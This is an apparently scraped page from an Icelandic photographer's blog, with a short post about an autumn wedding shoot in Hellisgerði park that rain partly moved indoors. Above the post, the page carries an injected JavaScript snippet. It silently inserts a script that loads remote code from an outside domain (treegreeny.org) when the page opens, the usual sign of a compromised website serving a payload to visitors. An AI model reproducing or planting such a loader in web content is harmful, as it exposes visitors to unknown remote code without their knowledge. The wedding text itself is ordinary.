;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Haustbrúðkaup í Hellisgerði – Eydís — Ljósmyndun

Haustbrúðkaup í Hellisgerði

diddasiggi-7

Þau voru dásamlegt par. Hlý, ástúðleg og reiðubúin að láta sem engin rigning væri. Enda skipti það engu máli þegar þau sáu ekkert nema hvort annað. Hellisgerði skartaði haustlitum og við rétt náðum nokkrum myndum áður en við urðum að hlaupa í skjól og finna stað innandyra fyrir restina af myndatökunni. Plan b er alltaf til staðar þegar veðurguðirnir stríða okkur. En ég var glöð að ná nokkrum myndum af þeim úti líka.

 

diddasiggi-8diddasiggi-6

Leave a Reply

Your email address will not be published. Required fields are marked *